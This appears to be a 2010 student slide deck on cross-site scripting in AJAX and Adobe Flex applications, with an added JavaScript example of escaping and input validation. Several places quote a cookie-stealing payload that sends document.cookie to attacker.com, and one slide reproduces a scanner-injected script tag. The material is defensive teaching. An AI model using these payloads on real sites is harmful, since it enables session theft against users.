Cross-Site Scripting (XSS) Vulnerability
in AJAX and Adobe Flex Applications
Danielle Cauthen
04/09/2010
COMS E6125 – Web enHanced Information Management
What is Cross-Site Scripting?
• Cross-Site Scripting, or XSS (not to be confused with CSS, Cascading Style Sheets), allows attackers to inject client-side script into a web page.
• The attacker injects script, such as JavaScript, VBScript, ActiveX, HTML, or Flash, into an application to try to gain access to sensitive information.
• Dynamic websites (using AJAX or Flex, for example) are vulnerable. Static websites are not at risk.

[Diagram of an XSS attack, from CGISecurity.com]
XSS Compared to Other Vulnerabilities

XSS is the #1 website security issue: there is a 66% likelihood that a given website has the vulnerability.
[Chart: statistics from the WhiteHat Website Security Report, Fall 2009 edition]
XSS Types

Two types of XSS attacks:
◦ Non-altering (or non-persistent): causes no change to the page's functionality.
◦ Altering (or persistent): a script injection that can be placed permanently in the database, causing a change to the page's functionality that persists each time the page is requested.
Non-Altering (Non-Persistent)
• An attacker can take a URL that contains personal data, e.g.
www.website.com/username=danielle
and modify the username field by entering JavaScript to steal the cookie, altering the URL to
www.website.com/username=<script>document.location='http://attacker.com/cookiesteal.cgi?'+document.cookie</script>
• To diminish suspicion, the attacker can URL-encode the JavaScript so it is not apparent.

Altering (Persistent)
• Within a forum, users' posts may be stored in a database, usually being tracked by a session ID cookie.
• An attacker can post a message containing malicious script which, if another user reads it, may compromise that user's account.

Threat to AJAX

• Because of the JavaScript and client-side scripting in AJAX, its largest security risk is XSS.
• From Ajax: The Definitive Guide:
◦ “Before Ajax, any attack made with an XSS vulnerability was done while the user's browser was in a wait state, and it usually coincided with some kind of visual indication by the browser that would give the user reason to think something untoward was happening.
◦ Once Ajax was introduced, this visual cue would disappear, and the user would have no way of knowing whether malicious code was being executed from the browser.”
Threat to Adobe Flex

• Though not as common as with AJAX, Flex has also been prone to cross-site scripting, especially if HTML and other scripting features are used in a Flex application.
• However, Adobe, aware of the threat, has strict security measures in place to prevent XSS:
◦ By default, you cannot call script on an HTML page if the HTML page is not in the same domain as the Flex application.
◦ Since a Flex application is compiled into a .swf file, it cannot itself be vulnerable to XSS.
◦ The sandbox security model prevents private information from being sent elsewhere.
Testing for XSS Vulnerabilities
• Acunetix Web Vulnerability Scanner – a tool that scans web applications for XSS vulnerabilities (more useful with AJAX applications).
• HP SWFScan – a tool that is helpful in finding security vulnerabilities in Flex/Flash applications. It decompiles and extracts the code from the .swf file, and then analyzes it for vulnerabilities.

Testing AJAX Application
• Using Acunetix, Kayak.com (the AJAX web application for travel comparison) was found to have 146 vulnerabilities.
• Example: when a user clicks on a menu item, such as Flights, that information is submitted as a GET parameter named tab. Acunetix was able to manipulate this variable numerous times, on one occasion setting tab to
<ScRiPt+bad=">"+src="http://testphp.acutenix.com/xss.js?40392"></ScRiPt>

Testing Flex
• Using HP SWFScan, the Flex application Sherwin Williams Color Visualizer (www.sherwinwilliams.com/visualizer) was tested.
• No XSS vulnerabilities were found.
Conclusion
• XSS can be both damaging and costly, compromising user security.
• XSS is a bigger risk to AJAX, due to its JavaScript and client-side scripting.
• Flex is vulnerable but much more resistant, due to Adobe's security features.
• Developers of both AJAX and Flex applications should check and validate any input to ensure it does not include script.
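The following is an added example, not code from the presentation, showing the "check and validate input" advice of this conclusion applied to the reflected-username case from the Non-Altering slide (the same escaping step applies to stored forum posts on the Altering slide). The function and constant names (escapeHtml, getQueryParam, isValidUsername, renderGreetingUnsafe, renderGreetingSafe, containsScriptTag) and the test URLs are hypothetical constructions for this example.

```javascript
// Added example, not code from the presentation. It shows the output-side
// defence (HTML escaping) and the input-side check the conclusion calls for,
// using the slide's own reflected-username payload as input.
// Hypothetical names: escapeHtml, getQueryParam, renderGreeting*, isValidUsername,
// containsScriptTag. The URLs below are constructed for the example.
// Characters that change meaning in HTML body or quoted-attribute context.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Read one query parameter. URLSearchParams percent-decodes the value, so a
// URL-encoded payload (the "diminish suspicion" trick on the slide) arrives in
// the same form as a plain one and must be treated exactly the same way.
function getQueryParam(url, name) {
  return new URL(url).searchParams.get(name);
}

// Input-side check: a username is an identifier, so accept only a short run
// of word characters instead of trying to strip "bad" fragments out.
function isValidUsername(username) {
  return /^[A-Za-z0-9_-]{1,32}$/.test(username);
}

// The 'before' form: raw request data concatenated into markup.
function renderGreetingUnsafe(username) {
  return "<p>Welcome, " + username + "</p>";
}

// The fixed form: every untrusted value is escaped for the context it lands in.
function renderGreetingSafe(username) {
  return "<p>Welcome, " + escapeHtml(username) + "</p>";
}

// Regression check: does a script tag survive into the rendered output?
function containsScriptTag(html) {
  return /<\s*script\b/i.test(html);
}

// Constructed inputs: the slide's cookie-stealing payload, plain and URL-encoded.
const PAYLOAD = "<script>document.location='http://attacker.com/cookiesteal.cgi?'+document.cookie</script>";
const PLAIN_URL = "http://www.website.com/?username=" + PAYLOAD;
const ENCODED_URL = "http://www.website.com/?username=" + encodeURIComponent(PAYLOAD);

const reflected = getQueryParam(ENCODED_URL, "username"); // decodes back to PAYLOAD
console.log(containsScriptTag(renderGreetingUnsafe(reflected))); // true: script reaches the page
console.log(containsScriptTag(renderGreetingSafe(reflected)));   // false: rendered as text
console.log(isValidUsername(reflected), isValidUsername("danielle")); // false true
```

Escaping is applied at the point where the value is written into HTML, so it protects stored forum posts as well as reflected parameters; the allow-list check is an extra layer for fields, like a username, whose legitimate values are narrow.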

References

Acunetix (2010). Web Vulnerability Scanner [Version 6.5]. Retrieved from
http://www.acunetix.com/vulnerability-scanner/download.htm

Adobe Systems Incorporated (2004). Cross Site Scripting in Flash. Retrieved
from http://kb2.adobe.com/cps/196/tn_19604.html

Adobe Systems Incorporated (2008). Adobe Flex Developer's Guide.
Retrieved from http://livedocs.adobe.com/flex/3/devguide_flex3.pdf

Cgisecurity.com (2002, May). The Cross Site Scripting (XSS) FAQ. Retrieved
from http://www.cgisecurity.com/xss-faq.html

Hewlett-Packard Development Company, L.P. (2009). SWFScan. Retrieved
from http://www.brothersoft.com/hp-swfscan-253747.html

Holdener III, Anthony T. (2008). Ajax: The Definitive Guide. Sebastopol, CA:
O’Reilly Media

WhiteHat Security (2009). WhiteHat Website Security Statistics Report.
Retrieved from
http://www.whitehatsec.com/home/assets/WPstats_fall09_8th.pdf